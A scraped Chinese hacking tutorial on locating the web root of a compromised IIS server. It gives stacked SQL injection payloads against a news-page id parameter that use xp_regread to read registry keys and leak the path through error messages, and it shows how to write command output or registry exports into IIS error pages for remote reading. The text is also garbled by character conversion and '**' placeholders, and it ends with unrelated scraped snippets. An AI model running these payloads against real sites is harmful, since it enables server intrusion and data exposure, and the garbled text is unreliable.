cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt (將2換成1、3、4、5試試)
type c:\test1.txt
del c:\test1.txt
在nbsi下可以直接顯示執行結果,所以不用匯出到檔案
2)在**上隨便找到乙個的名字123.jpg
然後寫進批處理程式123.bat:
執行後type c:\123.txt
這樣來分析**的路徑
3)sql伺服器和**伺服器在同乙個伺服器上,好了是可以執行命令是吧?
將執行命令輸出結果到
%windir%\help\iishelp\common\404b.htm或者500.asp
注意輸出前backup這兩個檔案
如:dir c:\ >%windir%\help\iishelp\common\404b.htm
然後隨便輸入乙個檔案來訪問:http://目標ip/2.asp
4)針對win2000系統: www.2cto.com
xp_regread讀取hkey_local_machine\system\controlset001\services\w3svc\parameters\virtual roots 獲取web路徑
2003系統:未找到利用方法
如:(1) 新建乙個表cyfd(欄位為gyfd): /newsshow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2) 把web路徑寫進去: @result varchar(255) exec master.dbo.xp_regread 』hkey_local_machine』,』system\controlset001\services\w3svc\parameters\virtual roots』, 』/』,@result output insert into cyfd (gyfd) values(@result);--
(3) 還是讓他不匹配,顯示錯誤: and 1=(select count(*) from cyfd where gyfd >1)
source: .net sqlclient data provider
description: 將varchar 值 』y:\web\煙台人才**後台管理系統,,201 』 轉換為資料型別為int 的列時發生語法錯誤。
targesite: boolean read() 哈哈哈。。路徑暴露了。。
(4)接下來刪除表:;drop table cyfd;--
5)用regedit命令匯出登錄檔,將匯出的結果儲存的路徑到%windir%\help\iishelp\common\404b.htm或者500.asp頁面
regedit命令說明:
regedit /l:system /r:user /e filename.reg regpath
引數含義:
/l:system指定system.dat檔案所在的路徑。
/r:user指定user.dat檔案所在的路徑。
/e:此引數指定登錄檔編輯器要進行匯出登錄檔操作,在此引數後面空一格,輸入匯出登錄檔的檔名。
regpath:用來指定要匯出哪個登錄檔的分支,如果不指定,則將匯出全部登錄檔分支。在這些引數中,"/l:system"和"/r:user"引數是可選項,如果不使用這兩個引數,登錄檔編輯器則認為是對windows目錄下的"system.dat"和"user.dat"檔案進行操作。如果是通過從軟盤啟動並進入dos,那麼就必須使用"/l"和"/r"引數來指定"system.dat"和"user.dat"檔案的具體路徑,否則登錄檔編輯器將無法找到它們。比如說,如果通過啟動盤進入dos,則備份登錄檔的命令是"regedit /l:c:\windows\/r:c:\windows\/e regedit.reg",該命令的意思是把整個登錄檔備份到windows目錄下,其檔名為"regedit.reg"。而如果輸入的是"regedit /e d:\regedit.reg"這條命令,則是說把整個登錄檔備份到d盤的根目錄下(省略了"/l"和"/r"引數),其檔名為"regedit.reg"。
regedit /s c:\adam.reg 匯入c:\adam.reg檔案至登錄檔
regedit /e c:\web.reg 備份全部註冊內容到c:\web.reg中
針對win2000系統:c:\>regedit /e %windir%\help\iishelp\common\404b.htm "hkey_local_machine\system\controlset001\services\w3svc\parameters\virtual roots"
然後 /2.asp
針對win2003系統:沒有找到,希望找到的朋友公布出來一起討論
檢視WEB絕對路徑目錄命令
檢視web絕對路徑目錄命令 檢視web 安裝目錄命令 cscript c inetpub adminscripts adsutil.vbs enum w3svc 2 root c test1.txt 將2換成1 3 4 5試試 type c test1.txt del c test1.txt 在nb...
相對 絕對路徑 rm mkdir 命令
絕對路徑是檔案的真正存在的路徑,是指從硬碟的根目錄開始,進行一級級目錄指向檔案。例如 root eweb ls usr local nginx 1.8.0.tar.gz usr local nginx 1.8.0.tar.gz 相對路徑就是以當前路徑為基準進行一級級目錄指向被引用的資源檔案。root...
hexagon絕對路徑
在 做什麼使用我就不說了,對大多數drivers來說都不會去接觸到,進一步的,也許拿不到要使用的版本。小問題會造成 煩。確定version oem a p build ms build.sh 或 build adspprocess.py target os.environ chipset os.en...